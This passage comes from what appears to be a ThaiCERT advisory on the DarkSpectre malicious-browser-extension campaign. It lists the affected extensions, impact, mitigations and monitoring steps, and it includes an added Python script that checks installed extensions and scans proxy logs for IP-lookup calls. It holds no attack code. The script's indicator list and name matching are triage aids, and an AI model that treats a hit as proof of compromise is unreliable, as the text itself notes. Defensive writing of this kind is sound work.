      1.2 DarkSpectre uses popular browser extensions as its vehicle to hide and spread on Google Chrome, Microsoft Edge and Mozilla Firefox.
      1.3 The campaign was first detected during the investigation of the ShadyPanda campaign and has affected more than 4 million devices worldwide.
      1.4 The malware is designed to activate later, using hidden JavaScript code to fetch malicious payloads from a C2 server.

      2. Threat overview (Overview)

      2.1 Threat type: Malware Campaign via Malicious Browser Extensions
      2.2 Attack technique: extensions that appear legitimate carry embedded JavaScript code that runs later and then contacts a C2 server to receive further commands
      2.3 The attacker does not need direct access to the system; it is enough for the user to install the extension
      2.4 Affected systems: user devices with the extensions installed on Chrome, Edge and Firefox

      3. Impact. If the DarkSpectre campaign succeeds, the consequences may include:
        3.1 The user's device is implanted with malware without their knowledge
        3.2 Additional malicious code is downloaded and executed remotely
        3.3 The device is controlled through the C2 server
        3.4 Personal and organisational data is leaked
        3.5 The device is used as a foothold to attack other systems on the network (Lateral Movement)

      4. Related browser extensions

      • Chrome Audio Capture
      • ZED: Zoom Easy Downloader
      • X (Twitter) Video Downloader
      • Google Meet Auto Admit
      • Zoom.us Always Show "Join From Web"
      • Timer for Google Meet
      • CVR: Chrome Video Recorder
      • GoToWebinar & GoToMeeting Download Recordings
      • Meet Auto Admit
      • Google Meet Tweak (Emojis, Text, Cam Effects)
      • Mute All on Meet
      • Google Meet Push-To-Talk
      • Photo Downloader for Facebook, Instagram
      • Zoomcoder Extension
      • Auto-join for Google Meet
      • Edge Audio Capture (Edge)
      • Twitter X Video Downloader (Firefox)
      • New Tab – Customized Dashboard (Edge)
      • "Google Translate" by charliesmithbons

      5. Prevention and risk reduction (Mitigation – Recommended)

      5.1 Review and remove unnecessary or risky browser extensions
      5.2 Allow installation only of extensions approved by the organisation (Extension Whitelisting)
      5.3 Update browsers and operating systems to the latest versions
      5.4 Scan devices with a trusted anti-malware product

      6. Additional monitoring guidance

      6.1 Review browser usage logs and network traffic for anomalies
      6.2 Monitor for connections to unknown C2 servers
      6.3 Check for calls to external IP lookup services such as ipinfo.io, which may be an indicator of malware behaviour
      6.4 Warn users to avoid installing extensions from untrusted sources
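      As an added example (not part of the advisory and not from Koi's research), the following Python script shows two follow-up checks a defender can run for sections 4 and 6 above: it inventories installed Chrome/Edge extensions by reading each extension's manifest.json from the profile's Extensions directory (the real Chrome layout, <profile>/Extensions/<id>/<version>/manifest.json) and compares the declared name against the advisory's list, and it scans proxy access-log lines for requests to external IP lookup services such as ipinfo.io. The profile tree, extension IDs and log lines are constructed for the demo so it runs offline; api.ipify.org and ifconfig.me are added as assumed additional lookup hosts, and a name match is an indicator to triage, not proof of compromise.

```python
"""Added example: extension inventory check and IP-lookup detection.

Not from the ThaiCERT advisory or the Koi research; demo data is constructed.
"""
import json
import re
import tempfile
from pathlib import Path

# Extension display names taken from the advisory's list (section 4).
AFFECTED_EXTENSION_NAMES = {
    "Chrome Audio Capture",
    "ZED: Zoom Easy Downloader",
    "X (Twitter) Video Downloader",
    "Google Meet Auto Admit",
    "Timer for Google Meet",
    "Edge Audio Capture",
    "Twitter X Video Downloader",
}

# ipinfo.io is named in the advisory; the other two are assumptions added here.
IP_LOOKUP_HOSTS = {"ipinfo.io", "api.ipify.org", "ifconfig.me"}


def _normalise(name: str) -> str:
    """Collapse whitespace and case so minor name variations still match."""
    return re.sub(r"\s+", " ", name).strip().casefold()


def find_listed_extensions(extensions_root, affected=AFFECTED_EXTENSION_NAMES):
    """Walk <Extensions>/<id>/<version>/manifest.json (Chrome/Edge layout).

    Returns (hits, unresolved): hits are (id, version, name) whose name is in
    the affected set; unresolved are manifests with localised __MSG_..__ names,
    which must be checked by hand against the extension's _locales files.
    """
    wanted = {_normalise(n) for n in affected}
    hits, unresolved = [], []
    for manifest in Path(extensions_root).glob("*/*/manifest.json"):
        try:
            data = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip, do not crash
        name = str(data.get("name", ""))
        ext_id, version = manifest.parent.parent.name, manifest.parent.name
        if name.startswith("__MSG_"):
            unresolved.append((ext_id, version, name))
        elif _normalise(name) in wanted:
            hits.append((ext_id, version, name))
    return sorted(hits), sorted(unresolved)


# Squid-style access log: ts elapsed client code bytes method url ...
_LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+\S+\s+(?P<client>\S+)\s+\S+\s+\S+\s+\S+\s+(?P<url>\S+)"
)


def find_ip_lookup_calls(log_lines, hosts=IP_LOOKUP_HOSTS):
    """Return [(client_ip, host)] for requests to an IP-lookup host or subdomain."""
    found = []
    for line in log_lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        # Strip scheme, path and port; CONNECT lines carry "host:port" only.
        host = re.sub(r"^[a-z]+://", "", m.group("url")).split("/")[0]
        host = host.split(":")[0].casefold()
        if any(host == h or host.endswith("." + h) for h in hosts):
            found.append((m.group("client"), host))
    return found


# Constructed proxy log lines for the demo (not real traffic).
SAMPLE_LOG_LINES = [
    "1736812800.123    45 10.0.0.15 TCP_MISS/200 512 GET https://ipinfo.io/json - HIER_DIRECT/203.0.113.10 application/json",
    "1736812801.456    30 10.0.0.15 TCP_MISS/200 2048 GET https://meet.google.com/ - HIER_DIRECT/203.0.113.11 text/html",
    "1736812802.789    20 10.0.0.22 TCP_TUNNEL/200 300 CONNECT api.ipify.org:443 - HIER_DIRECT/203.0.113.12 -",
    "not a log line",
]


def build_demo_profile(base_dir):
    """Create a constructed Extensions tree with fake IDs (demo data only)."""
    ext_root = Path(base_dir) / "Default" / "Extensions"
    demo = {
        "abcdefghijklmnopabcdefghijklmnop": ("1.4.2_0", "Chrome Audio Capture"),
        "bcdefghijklmnopabcdefghijklmnopa": ("2.0.0_0", "Example Benign Extension"),
        "cdefghijklmnopabcdefghijklmnopab": ("0.9.1_0", "__MSG_appName__"),
    }
    for ext_id, (version, name) in demo.items():
        d = ext_root / ext_id / version
        d.mkdir(parents=True)
        manifest = {"manifest_version": 3, "name": name, "version": version.split("_")[0]}
        (d / "manifest.json").write_text(json.dumps(manifest), encoding="utf-8")
    return ext_root


def run_demo():
    """Run both checks against the constructed data; returns (hits, unresolved, lookups)."""
    with tempfile.TemporaryDirectory() as tmp:
        hits, unresolved = find_listed_extensions(build_demo_profile(tmp))
    return hits, unresolved, find_ip_lookup_calls(SAMPLE_LOG_LINES)


if __name__ == "__main__":
    hits, unresolved, lookups = run_demo()
    print("listed extensions found:", hits)
    print("localised names to check manually:", unresolved)
    print("IP-lookup requests:", lookups)
```

      On a real host, point find_listed_extensions at the profile's Extensions directory (for example %LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions on Windows) and feed find_ip_lookup_calls the proxy's access log; a hit on either check is a reason to pull the extension and the device for closer review, not a verdict on its own.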

      7. Additional security recommendations (Security Hardening)

      7.1 Define an organisational policy governing the use of browser extensions
      7.2 Separate ordinary user privileges from administrator privileges
      7.3 Back up important data regularly
      7.4 Train users on the threats posed by browser extensions

      References
      https://www.techspot.com/news/110779-darkspectre-quietly-infected-millions-through-seemingly-legit-browser.html

      Posted in Cyber Security News
      NCSA_THAICERT
    • Cisco releases a patch for CVE-2026-20029 in ISE; risk of sensitive data leaking from the management web interface


      Follow the news on the webboard or on the NCSA Thailand Facebook page

      Posted in Cyber Security News
      NCSA_THAICERT
    • Veeam fixes an RCE vulnerability and other security issues


      Follow the news on the webboard or on the NCSA Thailand Facebook page

      Posted in Cyber Security News
      NCSA_THAICERT
    • Critical vulnerability in jsPDF; attackers could steal important files from the server


      Follow the news on the webboard or on the NCSA Thailand Facebook page

      Posted in Cyber Security News
      NCSA_THAICERT